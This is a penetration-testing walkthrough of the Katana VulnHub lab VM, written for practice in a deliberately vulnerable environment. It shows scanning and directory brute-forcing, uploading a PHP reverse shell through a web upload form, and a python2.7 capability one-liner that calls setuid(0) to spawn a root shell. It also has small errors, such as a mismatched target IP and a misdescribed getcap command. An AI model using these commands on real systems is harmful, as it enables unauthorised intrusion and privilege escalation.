Katana: Vulnhub Walkthrough
Katana VM is made by SunCSR Team. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.
- Browsing HTTP Service
- Directory Scanning (Dirb)
- Uploading PHP Reverse Shell
Let’s start by scanning the network for targets using Netdiscover.
We found the target IP Address 192.168.1.119. Let’s begin with basic port scanning with NMAP.
nmap -p- -A 192.168.1.11
For more details, we will navigate to a web browser for exploring HTTP service since port 80 is open. It clearly is not enough for a clue to proceed.
Till now we didn’t find any hint to establish our foothold, therefore we chose DIRB for directory brute force attack on port 8088. After a few tries we found URL for an HTML page for upload, Let’s browse it and see what service it has.
dirb http://192.168.1.119:8088/ -X .html
On browsing the page we saw the page consist of file upload option but why does it have two upload options. This is interesting. We went for the second upload option and upload the pentestmonkey’s php reverse shell. Let’s see if we can shell this machine.
After successfully uploading our file, it asked us to wait for 1 minute. The message that made us curious was the shell upload was internally redirected to another directory after being uploaded. The only thing left is to execute our shell.
After a few tries, we changed the port from 8088 to 8715 because the previous hint gave a clue that the file has been internally redirected. So changing port and executing the file got us the shell.
Thus, we explored further and looked for weak service configuration such as SUDO and SUID permission but found nothing related to it. After spending some more time, we saw capability with +ep permission is set on python2.7. We have used this command to remove the file capability.
getcap -r / 2>/dev/null
There we got out shell. The only thing left is to get the root access. We looked for system capabilities and found empty capability (ep) over suid is given python2.7 for www-data that means all privilege is assigned to www-data for that program, therefore taking advantage of this permission we can escalate into high privilege from low privilege shell using the command below.
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
*NOTE- For Privilege Escalation through Capabilities. Please refer the link below.
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Security Analyst. Contact Here